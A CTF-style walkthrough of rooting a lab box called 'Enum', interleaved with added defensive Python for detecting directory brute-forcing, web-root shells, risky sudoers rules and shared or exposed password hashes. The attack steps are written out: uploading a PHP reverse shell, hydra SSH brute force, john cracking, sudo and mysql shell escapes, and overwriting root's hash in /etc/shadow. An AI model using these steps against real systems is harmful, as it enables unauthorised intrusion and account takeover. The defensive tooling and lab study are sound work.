Enum
nmap 192.168.107.132 -sCV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The target has only the web (80) and SSH (22) ports open.
So, as usual, we brute-force the directories of the target:
python3.9 dirsearch.py -u 192.168.107.132 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --suffix=.php,.html,.aspx,.jsp,.js
[10:31:43] 200 - 11KB - /index.html
[10:31:43] 200 - 4KB - /mini.php
[10:31:44] 301 - 323B - /javascript -> http://192.168.103.132/javascript/
[10:31:55] 301 - 323B - /phpmyadmin -> http://192.168.103.132/phpmyadmin/
[10:31:55] 200 - 13KB - /phpmyadmin/doc/html/index.html
[10:31:57] 200 - 10KB - /phpmyadmin/index.php
[10:31:57] 200 - 10KB - /phpmyadmin/
[10:32:01] 200 - 21B - /robots.txt
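The dirsearch run above leaves a very recognisable trace in the Apache access log: one client, a burst of requests over a few seconds, and a high share of 404 responses with a handful of 200/301 hits (here /mini.php and /phpmyadmin/) mixed in. The following is an added example, not part of the original writeup, of how a defender can pick that pattern out of a combined-format access log. The log lines are constructed for the example; the thresholds (five requests, half of them 404) are assumptions to tune for a real site.

```python
import re
from collections import defaultdict

# Apache "combined" log format: client IP, timestamp, request line, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not from the box): one client probing paths the way
# dirsearch does, a normal visitor, and one malformed line the parser must skip.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:31:43 +0000] "GET /index.html HTTP/1.1" 200 11264 "-" "dirsearch/0.4"
10.0.0.5 - - [01/Jan/2024:10:31:43 +0000] "GET /admin.php HTTP/1.1" 404 275 "-" "dirsearch/0.4"
10.0.0.5 - - [01/Jan/2024:10:31:43 +0000] "GET /backup.zip HTTP/1.1" 404 275 "-" "dirsearch/0.4"
10.0.0.5 - - [01/Jan/2024:10:31:44 +0000] "GET /config.php HTTP/1.1" 404 275 "-" "dirsearch/0.4"
10.0.0.5 - - [01/Jan/2024:10:31:44 +0000] "GET /test.php HTTP/1.1" 404 275 "-" "dirsearch/0.4"
10.0.0.5 - - [01/Jan/2024:10:31:44 +0000] "GET /login.php HTTP/1.1" 404 275 "-" "dirsearch/0.4"
10.0.0.5 - - [01/Jan/2024:10:31:45 +0000] "GET /uploads/ HTTP/1.1" 404 275 "-" "dirsearch/0.4"
10.0.0.5 - - [01/Jan/2024:10:31:45 +0000] "GET /mini.php HTTP/1.1" 200 4096 "-" "dirsearch/0.4"
10.0.0.9 - - [01/Jan/2024:10:32:01 +0000] "GET /index.html HTTP/1.1" 200 11264 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:32:02 +0000] "GET /robots.txt HTTP/1.1" 200 21 "-" "Mozilla/5.0"
this line is not a valid access-log record
"""


def parse_access_log(lines):
    """Yield one dict per well-formed combined-format line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_enumeration(lines, min_requests=5, min_404_ratio=0.5):
    """Flag clients whose traffic looks like path brute-forcing.

    A scanner produces many distinct paths and a high proportion of 404s;
    the occasional 200/301 hit in between does not lower the ratio much.
    """
    per_ip = defaultdict(lambda: {"total": 0, "not_found": 0, "paths": set()})
    for rec in parse_access_log(lines):
        s = per_ip[rec["ip"]]
        s["total"] += 1
        s["paths"].add(rec["path"])
        if rec["status"] == "404":
            s["not_found"] += 1

    flagged = {}
    for ip, s in per_ip.items():
        if s["total"] >= min_requests and s["not_found"] / s["total"] >= min_404_ratio:
            flagged[ip] = {
                "total": s["total"],
                "not_found": s["not_found"],
                "distinct_paths": len(s["paths"]),
            }
    return flagged


if __name__ == "__main__":
    for ip, stats in find_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {stats['not_found']}/{stats['total']} requests were 404 "
              f"across {stats['distinct_paths']} distinct paths")
```

On the sample, 10.0.0.5 is reported (6 of 8 requests were 404 across 8 distinct paths) while the two-request visitor 10.0.0.9 is not. The same counting works per time window if you group on the timestamp field as well.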
robots.txt
curl 192.168.103.132/robots.txt
Allow: Enum_this_Box
phpmyadmin
I use hydra to try to crack the password with the default username root, but nothing is found.
When I browse to mini.php, it turns out to be a Zerion Mini Shell 1.0.
log as www-data
So I upload the webshell to /var/www/html.
(The webshell is /usr/share/webshells/php/php-reverse-shell.php.)
Then I browse to /webshell.php directly, because we know the file was written to the web root directory.
This gives me a shell as www-data. Afterwards, I find there are five users on this machine:
goat harry karla oracle sally
While enumerating the directories I found that phpMyAdmin runs on this machine, so I try to find the SQL password.
Finally, I find it in /etc/phpmyadmin/config-db.php.
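The foothold in this section is a PHP file dropped into the web root. From the defender's side, a reverse shell like the one used here has a characteristic shape: it opens a socket and spawns a process, whereas application code rarely does both in one file. The following is an added example, not from the original writeup, of a small web-root scanner that looks for that combination. The web root it scans is constructed in a temporary directory for the example, and the suspect file there is a non-functional fragment that only carries the indicator names.

```python
import os
import re
import tempfile

# Primitives that, in combination, make up the shape of a PHP reverse or command shell.
INDICATORS = {
    "network": re.compile(r"\b(?:fsockopen|socket_create|stream_socket_client)\s*\("),
    "process": re.compile(r"\b(?:proc_open|popen|shell_exec|passthru|exec|system)\s*\("),
    "user_input": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["),
    "eval": re.compile(r"\b(?:eval|assert)\s*\("),
}


def indicators_in(source):
    """Return the sorted indicator names present in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))


def is_suspicious(found):
    # Spawning a process is only alarming when it is wired to a socket or to
    # request data; eval()/assert() is rare enough in app code to always review.
    if "eval" in found:
        return True
    return "process" in found and ("network" in found or "user_input" in found)


def scan_webroot(root):
    """Walk a web root and return {relative path: indicators} for suspicious PHP files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml", ".php5")):
                continue
            full = os.path.join(dirpath, fname)
            with open(full, encoding="utf-8", errors="ignore") as fh:
                found = indicators_in(fh.read())
            if is_suspicious(found):
                hits[os.path.relpath(full, root)] = found
    return hits


def make_sample_webroot():
    """Create a constructed web root: two benign files and one suspect fragment."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "lib"))
    samples = {
        # reads request data but never runs a command: not flagged
        "index.php": '<?php $page = $_GET["page"] ?? "home"; echo "hello"; ?>',
        "lib/db.php": '<?php $db = mysqli_connect("localhost", "user", "pass"); ?>',
        # constructed, non-functional fragment carrying the socket + process indicators
        "webshell.php": "<?php $sock = fsockopen($host, $port); proc_open($cmd, $spec, $pipes); ?>",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, found in scan_webroot(make_sample_webroot()).items():
        print(f"{path}: {', '.join(found)}")
```

Run against a real web root this is a triage aid rather than a verdict: a file that legitimately calls proc_open will show up and must be reviewed by hand, and checking file modification times against the last deployment narrows the list further.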
log as oracle
The www-data user has no sudo privileges, so I have to find another way to escalate privileges.
I open /etc/passwd and find the password hash of the oracle user stored there.
So I save the hash locally in a file named passwd and use john to crack the password with the rockyou wordlist, and I get it.
john --wordlist=/usr/share/wordlists/rockyou.txt passwd
This user is not allowed to log in via SSH, so I use su oracle to log in. Unluckily, there is nothing I can do with the oracle account.
log as karla
I use the password to log in to SQL, but find nothing interesting in the databases it contains.
Then I think that maybe this password is reused by other users in the /home directory.
So I start trying the passwords against the users until I get a match on the user "karla". This user is even allowed to log in by SSH.
Surprisingly, when I check sudo -l, I find karla can run any command as root, so I just need to run
sudo /bin/bash
And I get root privileges.
Another way
log as goat
The author of this machine says I should use rockyou to enumerate the target. But I had only used it to get the password of the useless oracle account. So I try hydra with the usernames I found in /home to crack the passwords.
I save the users in a file named username.
hydra -L username -P rockyou.txt -V 192.168.49.107 ssh
Luckily, I get the credentials goat:goat, and this account can also log in via SSH.
Following the same steps as above, I find that I can use sudo to run mysql.
So I use mysql to get a root shell:
sudo mysql # run mysql with root privileges
system bash # use the mysql client to execute a command
Or you can just use:
sudo /usr/bin/mysql -e '! /bin/sh'
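Both privilege escalations in this writeup come from sudo rules: karla's rule grants every command, and goat's rule grants mysql, a program that can run a system command from inside the client, which is the same as granting a shell. The following is an added example, not from the original writeup, of a sudoers audit that parses user specifications and reports both kinds of rule. The sudoers excerpt is constructed for the example, and the list of shell-capable programs is a short assumed sample rather than a complete catalogue.

```python
import os
import re

# Sudoers user specification:  user  host=(runas)  [TAG:] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG_RE = re.compile(
    r"^(?P<tag>NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*"
)

# Interactive programs that can hand their caller a shell; a sudo rule naming one of
# them is equivalent to a root shell (mysql is the one this writeup uses). Assumed sample list.
SHELL_ESCAPES = {"mysql", "bash", "sh", "vim", "vi", "less", "more", "find", "awk", "perl", "python", "python3"}

# Constructed /etc/sudoers excerpt (not from the box).
SAMPLE_SUDOERS = """\
# constructed sample
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
karla   ALL=(ALL) ALL
goat    ALL=(root) NOPASSWD: /usr/bin/mysql
sally   ALL=(root) /usr/bin/systemctl status apache2
%admin  ALL=(ALL) ALL
"""


def parse_sudoers(text):
    """Return one dict per user specification; comments and Defaults lines are ignored."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest").strip()
        tags = set()
        while (t := TAG_RE.match(rest)):      # strip leading NOPASSWD: / SETENV: ... tags
            tags.add(t.group("tag"))
            rest = rest[t.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append({
            "user": m.group("user"),
            "hosts": m.group("hosts"),
            "runas": m.group("runas") or "root",   # sudo's default run-as user
            "tags": tags,
            "commands": commands,
        })
    return rules


def audit_sudoers(rules):
    """Report rules that amount to a root shell: ALL, or a shell-capable program."""
    findings = []
    for r in rules:
        if r["user"] == "root":
            continue  # root already has everything; not a finding
        for cmd in r["commands"]:
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                issue = "all_commands"
            elif binary in SHELL_ESCAPES:
                issue = "shell_escape"
            else:
                continue
            findings.append({"user": r["user"], "command": cmd, "issue": issue,
                             "nopasswd": "NOPASSWD" in r["tags"]})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(parse_sudoers(SAMPLE_SUDOERS)):
        flag = " (NOPASSWD)" if f["nopasswd"] else ""
        print(f"{f['user']}: {f['issue']} via {f['command']}{flag}")
```

On the sample, karla and the %admin group are reported for ALL and goat for /usr/bin/mysql without a password; sally's systemctl status rule is left alone. On a live system, `sudo -l -U <user>` shows the effective rules including those from /etc/sudoers.d, which is what this parser would be fed.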
After root
After escalating to root, I think there may be other ways into the machine, so I open /etc/shadow to get the hashes of the other users and run john to get the passwords of all of them except root. But, as I thought, they don't give another way to log in.
Until now, root is the only account I cannot log in to with a password. So I decide to edit /etc/shadow to change root's password: I copy harry's hash into root's entry, so that I can log in as root with 123456.
Now I completely own the target machine.
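Two of the weaknesses this writeup relies on live in the account database itself: oracle's hash sits in the world-readable /etc/passwd instead of /etc/shadow, and at the end the same hash string appears under two accounts in /etc/shadow after being copied into root's entry. Both are visible to a local audit. The following is an added example, not from the original writeup, that parses both files and reports hashes stored in passwd, empty password fields, identical hashes shared by several accounts, and legacy hash algorithms. The file contents are constructed for the example, with placeholder hash values.

```python
WEAK_ALGOS = {"descrypt", "md5crypt"}

# Constructed samples (not from the box): placeholder hash strings, not real digests.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
oracle:$1$cnstrctd$abcdefghijklmnopqrstuv:1001:1001::/home/oracle:/bin/bash
karla:x:1002:1002::/home/karla:/bin/bash
harry:x:1003:1003::/home/harry:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$sameSalt$PLACEHOLDERHASHA:19000:0:99999:7:::
harry:$6$sameSalt$PLACEHOLDERHASHA:19000:0:99999:7:::
karla:$6$otherSalt$PLACEHOLDERHASHB:19000:0:99999:7:::
oracle:*:19000:0:99999:7:::
"""


def classify_hash(field):
    """Label the password field of a passwd or shadow entry."""
    if field == "":
        return "empty"            # no password needed at all
    if field == "x":
        return "shadowed"         # the real hash lives in /etc/shadow
    if field.startswith(("!", "*")):
        return "locked"
    prefixes = {"$1$": "md5crypt", "$2": "bcrypt", "$5$": "sha256crypt",
                "$6$": "sha512crypt", "$y$": "yescrypt"}
    for prefix, name in prefixes.items():
        if field.startswith(prefix):
            return name
    return "descrypt"             # no $id$ prefix: legacy DES crypt (or unknown)


def parse_colon_file(text):
    """Split passwd/shadow-style lines into field lists, skipping blanks and comments."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def audit_passwd(text):
    """Findings for /etc/passwd: any usable hash here is readable by every local user."""
    findings = []
    for fields in parse_colon_file(text):
        if len(fields) < 7:
            continue
        name, kind = fields[0], classify_hash(fields[1])
        if kind == "empty":
            findings.append((name, "empty_password"))
        elif kind not in ("shadowed", "locked"):
            findings.append((name, "hash_in_passwd"))
            if kind in WEAK_ALGOS:
                findings.append((name, "weak_hash_algorithm"))
    return findings


def audit_shadow(text):
    """Findings for /etc/shadow: empty or weak hashes, and hash strings shared by accounts."""
    findings = []
    by_hash = {}
    for fields in parse_colon_file(text):
        if len(fields) < 2:
            continue
        name, pw = fields[0], fields[1]
        kind = classify_hash(pw)
        if kind == "empty":
            findings.append((name, "empty_password"))
        elif kind not in ("shadowed", "locked"):
            by_hash.setdefault(pw, []).append(name)
            if kind in WEAK_ALGOS:
                findings.append((name, "weak_hash_algorithm"))
    # Salted hashes only collide when a hash string was copied between entries.
    for names in by_hash.values():
        if len(names) > 1:
            findings.extend((n, "duplicate_hash") for n in names)
    return findings


if __name__ == "__main__":
    for account, issue in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW):
        print(f"{account}: {issue}")
```

On the sample, oracle is reported for a hash in passwd (and for md5crypt), and root and harry for sharing one hash string; karla, whose hash has its own salt, is not. A shared hash string is worth alerting on even when both accounts are legitimate, since properly set passwords get distinct salts and never collide this way.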